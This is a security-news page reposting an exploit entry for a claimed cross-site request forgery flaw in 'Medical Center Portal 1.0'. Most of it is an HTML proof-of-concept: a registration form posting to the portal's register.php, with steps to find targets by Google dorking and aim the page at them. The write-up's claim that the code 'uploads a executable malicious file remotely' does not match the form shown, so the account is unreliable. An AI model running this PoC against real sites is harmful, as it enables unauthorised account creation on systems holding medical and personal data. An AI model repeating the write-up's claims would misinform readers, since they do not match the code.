Security
Headlines
HeadlinesLatestCVEs

Headline

Medical Center Portal 1.0 Cross Site Request Forgery

Medical Center Portal version 1.0 suffers from a cross site request forgery vulnerability.

Packet Storm
#csrf#vulnerability#mac#windows#google#php#auth#firefox
=============================================================================================================================================| # Title     : Medical Center Portal 1.0 CSRF Vulnerability                                                                                || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/medic.zip                                             |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] The following html code uploads a executable malicious file remotely .[+] Go to the line 52.[+] Set the target site link Save changes and apply . [+] save code as poc.html .<!DOCTYPE html><html lang="en"><head>    <meta charset="UTF-8">    <meta name="viewport" content="width=device-width, initial-scale=1.0">    <title>Registration Form</title>    <style>        body {            font-family: Arial, sans-serif;            margin: 20px;            padding: 20px;            max-width: 600px;            background-color: #f4f4f4;            border-radius: 8px;        }        .form-container {            display: flex;            flex-direction: column;        }        .form-group {            margin-bottom: 15px;        }        .form-group label {            font-weight: bold;            margin-bottom: 5px;            display: block;        }        .form-group input, .form-group select {            padding: 8px;            width: 100%;            border: 1px solid #ccc;            border-radius: 4px;        }        .form-group select {            cursor: pointer;        }        .form-group button {            padding: 10px 15px;            background-color: #007bff;            color: white;            border: none;            cursor: pointer;            border-radius: 4px;        }        .form-group button:hover {            background-color: #0056b3;        }    </style></head><body>    <h2>Registration Form</h2>    <form action="http://127.0.0.1/medic/pages/register.php?action=add" method="POST" class="form-container">        <div class="form-group">            <label for="firstname">First Name:</label>            <input type="text" id="firstname" name="firstname" required>        </div>        <div class="form-group">            <label for="nid">National ID (NID):</label>            <input type="text" id="nid" name="nid" required>        </div>        <div class="form-group">            <label for="gender">Gender:</label>            <select id="gender" name="gender" required>                <option value="">Select Gender</option>                <option value="male">Male</option>                <option value="female">Female</option>            </select>        </div>        <div class="form-group">            <label for="email">Email:</label>            <input type="email" id="email" name="email" required>        </div>        <div class="form-group">            <label for="phonenumber">Phone Number:</label>            <input type="text" id="phonenumber" name="phonenumber" required>        </div>        <div class="form-group">            <label for="jobs">Job:</label>            <select id="jobs" name="jobs" required>                <option value="">Select Job</option>                <option value="doctor">Doctor</option>                <option value="nurse">Nurse</option>                <option value="pharmacist">Pharmacist</option>            </select>        </div>        <div class="form-group">            <label for="province">Province:</label>            <select id="province" name="province" required>                <option value="">Select Province</option>                <option value="province1">Province 1</option>                <option value="province2">Province 2</option>                <option value="province3">Province 3</option>            </select>        </div>        <div class="form-group">            <label for="city">City:</label>            <select id="city" name="city" required>                <option value="">Select City</option>                <option value="city1">City 1</option>                <option value="city2">City 2</option>                <option value="city3">City 3</option>            </select>        </div>        <div class="form-group">            <label for="username">Username:</label>            <input type="text" id="username" name="username" required>        </div>        <div class="form-group">            <label for="password">Password:</label>            <input type="password" id="password" name="password" required>        </div>        <div class="form-group">            <button type="submit">Register</button>        </div>    </form></body></html>Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Packet Storm: Latest News

CUPS IPP Attributes LAN Remote Code Execution